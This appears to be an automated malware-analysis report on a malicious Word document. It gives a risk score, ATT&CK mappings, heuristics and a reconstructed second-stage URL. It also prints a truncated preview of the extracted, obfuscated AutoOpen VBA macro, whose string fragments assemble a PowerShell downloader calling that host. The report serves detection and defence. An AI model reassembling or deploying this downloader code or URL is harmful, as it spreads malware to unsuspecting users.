MALICIOUS
242
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing a VBA macro. The macro utilizes the Shell() function, indicating an attempt to execute external commands or download additional payloads. The reconstructed URL 'http://www.wiganmb.com/mOOlU' is likely the source of a second-stage payload. The AutoOpen macro and the ClamAV signature 'Img.Dropper.PhishingLure-6443153-0' further support its malicious nature as a downloader or dropper.
Heuristics 7
-
ClamAV: Img.Dropper.PhishingLure-6443153-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 66615 bytes |
SHA-256: b30fbad56110915eac534d7206dd0e2e0a24dc9bb3eec94280cbf7ee92da00b7 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "rNBcrFSlB"
Function AoAEflDwjt()
On Error Resume Next
uIXiNz = (CRzOUiZAkAIL - CByte(KjMMtNCthn + Sin(61) + 18077887 / pwGmiTNlISrqZ)) + (82162758 - Sqr(GQIwVAhtEQ) / wVDjprVdK + Hex(VbmRRnWDET))
RwJjipR = (tcijPCrVQsq - CByte(LjRCfozcQKcbq + Sin(61) + 18077887 / dIuQLulK)) + (82162758 - Sqr(LbEpluUNkqnpi) / ahluAJiADtIYia + Hex(hwGBpFbawLhwzs))
oUzufwjUI = ljoGoEnmp + Mid("DcIrfGcchAr]84+[chAr]74),[stRING][chAr]124).RepLACe(([chAr]70+[chAr]108+[chAr]103),'$').RepLACe(([chAr]122+[chAr]90+[ch7K0liMiKLIALB1aQn2AinTz5", 8, 112) + cjfBLLcNZrc
TzzwwnPtSI = (nrmztzLmHvuqU - CByte(wJCSbVMPvloV + Sin(61) + 18077887 / DNLqzwcLdQm)) + (82162758 - Sqr(uJrDdalSiTdTlc) / dXwBIYSHZvFuts + Hex(UtQWhMVMRK))
PsXrTGWB = (klqQKvhCHnEMv - CByte(fbCUWPz + Sin(61) + 18077887 / bsWZmmnW)) + (82162758 - Sqr(NjMTsllOM) / iSXCEVnvc + Hex(SpctZKz))
UOomajGUo = (wkDOvlHL - CByte(qEUWXpEAXut + Sin(61) + 18077887 / odmwGKDFsiMd)) + (82162758 - Sqr(lznqbNrcBYZD) / icCYIwj + Hex(KGRQpbDGmLs))
pMlUj = DwkjrEX + Mid("AE8fuIzOOBAui4W5pLrtiuLcfYdphSRZp://wwPd0+Pd0w.wPd0+Pd'+'0iPzZB+zZBd0+Pd0zZB+zZBllarPd0+Pd0dzZB+zZBwiganmb'+'Pd0+Pd0e.com/'+'Pd0'+'+Pd0mOOlU", 33, 105) + wnjPdXbBRHYfrZ
TCNXckcZijW = (kIuPlYrfiinpRF - CByte(ATsEqREz + Sin(61) + 18077887 / LSvXETuinrdDU)) + (82162758 - Sqr(hwKYmEImm) / icajGHcj + Hex(EEScTbPo))
zfpIaZnawCY = (ZNAGLhcZQnoTk - CByte(pSvGVziCShvhU + Sin(61) + 18077887 / TIZztnGbS)) + (82162758 - Sqr(JwuTKQpPvFqKj) / bBHWvTLd + Hex(PFINpawiN))
RfoUQmSQWBQ = (sbsNbfOzuQKO - CByte(qzXQCjMkYw + Sin(61) + 18077887 / VAckOOVimt)) + (82162758 - Sqr(AWadWLiMPtw) / pvuifpTwUiWs + Hex(DijfvjcbPwB))
jFSwC = CZcGfEL + Mid("Iww8EKtcn3ho8nsPd0+Pd0adasd =P'+'d0+Pd0 Pd0+Pd0nPd0+Pd0ew-Kf", 12, 47) + fsRuiZj
WzIDiIIMjlY = (DwYFPsBrfmOWJb - CByte(Xrjjjzhfj + Sin(61) + 18077887 / NBDAowXcKdM)) + (82162758 - Sqr(wsitbfr) / svhwRjQwhzWRpa + Hex(rwqrnqu))
ipazripKHIX = (hZDqHtiwO - CByte(dSVAmzFErBpo + Sin(61) + 18077887 / nHKlkqL)) + (82162758 - Sqr(iBzXFwrfXcktd) / MjzDwDorlbt + Hex(PiwItICswQ))
JKQCoadjaA = (WrmvloDI - CByte(zjsvodsucUdFnj + Sin(61) + 18077887 / rGlFSznqJI)) + (82162758 - Sqr(wTrmNjboUl) / oQEfzimRH + Hex(IPDiCwqwJsjm))
lJwtuw = wEVunFmXBnjmRU + Mid("CO43mbBGOQd9lRRcKYRMCAr]66),[stRING][chAr]39)| &zKsfMjWi68JS7vZW", 22, 27) + jFiYuKHu
liAAazodm = (chDNYUYEuZ - CByte(viojsIEnQ + Sin(61) + 18077887 / iijIiPicql)) + (82162758 - Sqr(vLUWupPXMWw) / CnSTNPunLAzwwX + Hex(pEpcDom))
WaCWvELcC = (zKCinSu - CByte(uDRqtiwPojkj + Sin(61) + 18077887 / JNBVnrz)) + (82162758 - Sqr(msawjQni) / wJTBVsBEaQY + Hex(iYbzAqwBJzau))
TGYHwmTp = (MwzQuNWYWk - CByte(SWuuJQnzAC + Sin(61) + 18077887 / bwuwvRMtj)) + (82162758 - Sqr(IUPHqVFEzl) / hPzhHlcNiQv + Hex(uUwVwSELd))
jJkEbz = STKwSpQ + Mid("tml5cLCN56Pd0'+'zZB+zZB2Pd0+PdzZB+zZB0eQ;fo'+'reacPd0+Pd0h(Do8abzZB+zZBc Pd0+Pd0in Do8Pd0+Pd0bPd0+Pd0cd){t'+'Pd0+Pd0ry{Do8PdstRlKZ5", 11, 114) + BjldVQv
ndGijTKB = (IKqsNSIkKha - CByte(znUzQNbb + Sin(61) + 18077887 / HTzBfZqcUw)) + (82162758 - Sqr(YbNhKMMzPwTq) / kBCcCsm + Hex(TBArrrisSHqiro))
JKlTiZKbdP = (cvrnBNUvn - CByte(oTYzjnJWjhVjLT + Sin(61) + 18077887 / EzjWqXJ)) + (82162758 - Sqr(qlqLYdAXw) / UIcUDJQvj + Hex(zzwkYmzOlZwXiD))
YEFcZhQEP = (FzqdHJvdcpN - CByte(lUIcMOtaDVDjP + Sin(61) + 18077887 / GjwNwViVYN)) + (82162758 - Sqr(LVpVAuZNmaPw) / AcZvakuKNlCLiO + Hex(rGPwvtBsDEDai))
onkVNwJzOH = anoDAdLZod + Mid("flace Pd0Do8Pd0,[cHAr]36 -Replace([cH'+'Ar]112+[cHAr]114+[cHAr]116zZB+zZB),['+'cHAr]92) iOb&( s'+'d4pSHomE[21zZB+zZB]+sd4pshomE[34]+Pd8juiQ3LqV", 2, 134) + RiXOabMkEZMqTV
ERjlQ = (MtbktfJZNqKY - CByte(vaFvrPStoGnm + Sin(61) + 18077887 / mlXWwdYmrQp)) + (82162758 - Sqr(nOnYitNN) / TLTBjPkoX + Hex(owNtXCrthAzDJ))
hPiGdJA = (zjqUDNUNrWYzR - CByte(UdVhidmzjwbtq + Sin(61) + 18077887 / KnXELPnPsJwp)) + (82162758 - Sqr(ZoYuXDjsY) / w
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.